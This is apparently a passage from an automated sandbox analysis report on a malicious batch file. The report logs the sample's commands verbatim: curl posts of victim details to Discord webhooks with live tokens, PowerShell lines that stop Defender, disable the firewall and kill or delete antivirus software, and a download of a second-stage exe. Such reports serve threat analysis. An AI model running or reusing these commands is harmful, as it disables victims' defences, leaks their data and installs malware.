        Source: powershell.exe, 00000014.00000002.1961641784.00000224A3AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000009.00000002.1496227351.00000269942A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024780C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1961641784.00000224A44B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
        Source: powershell.exe, 00000009.00000002.1519896951.00000269A3822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1519896951.00000269A36DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024781632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.00000247901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.000002479006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640E430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CC11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC10A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B38F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 0000000E.00000002.1639610296.000002640DEEE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
        Source: powershell.exe, 0000000E.00000002.1639610296.000002640DEEE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
        Source: explorer.exe, 00000017.00000003.2305006917.00000000091E9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304007048.00000000091E9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.com
        Source: powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ptb.disc
        Source: powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ptb.discord
        Source: powershell.exe, 00000015.00000002.2166099676.0000025C19944000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ptb.discord.com/api/webhooks/1
        Source: powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ptb.discord.com/api/webhooks/12918514
        Source: powershell.exe, 00000023.00000002.2386798148.000002D2C6330000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSR
        Source: powershell.exe, 00000023.00000002.2398128595.000002D2C9C3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1Ui
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 64913 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 64892 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64901
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64913
        Source: unknown | Network traffic detected: HTTP traffic on port 64897 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 64901 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64892
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64897
        Source: unknown | HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.8:49707 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.8:49710 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:64892 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:64897 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.8:64901 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:64913 version: TLS 1.2

        E-Banking Fraud

        Source: Yara match | File source: C:\Users\Public\Documents\Secret Document\exe.exe, type: DROPPED

        System Summary

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\Documents\Secret Document\exe.exe
        Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FFB4B36091E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 35_2_00007FFB4E7F0EBD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 35_2_00007FFB4E7FCE60
        Source: exe.exe.32.dr | Static PE information: No import functions for PE file found
        Source: classification engine | Classification label: mal100.troj.expl.evad.winBAT@46/42@5/4
        Source: C:\Windows\System32\cmd.exe | File created: C:\Users\Public\Documents\Secret Document
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgaifbew.1vy.ps1
        Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" "
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\explorer.exe
        Source: C:\Windows\explorer.exe | File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: C:\Windows\System32\curl.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer,model
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /i "vmware virtualbox"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net session
        Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES33AA.tmp" "c:\Users\user\AppData\Local\Temp\l1mwkpcb\CSC55DD152A8365426E9AFFE8E8746FD1A1.TMP"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\user\Desktop\main.bat.bin.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Stop-Process -Name MSASCui -Force -ErrorAction SilentlyContinue"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$s='taskkill /F /IM'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\explorer.exe explorer.exe
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to change directory to 'C:\\Users\\Public\\Documents\\Secret Document'\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd"
        Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to create and change directory to 'C:\\Users\\Public\\Documents\\Secret Document' after retry\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd' -Method Post -Body (@{content='Failed to download exe.exe'} | ConvertTo-Json) -ContentType 'application/json'"
        Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: mswsock.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: schannel.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
        Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: mswsock.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: schannel.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\System32\curl.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\net.exe | Section loaded: mpr.dll
        Source: C:\Windows\System32\net.exe | Section loaded: wkscli.dll
        Source: C:\Windows\System32\net.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\net.exe | Section loaded: samcli.dll
        Source: C:\Windows\System32\net.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\net.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\net1.exe | Section loaded: samcli.dll
        Source: C:\Windows\System32\net1.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\net1.exe | Section loaded: dsrole.dll
        Source: C:\Windows\System32\net1.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\net1.exe | Section loaded: wkscli.dll
        Source: C:\Windows\System32\net1.exe | Section loaded: logoncli.dll
        Source: C:\Windows\System32\net1.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
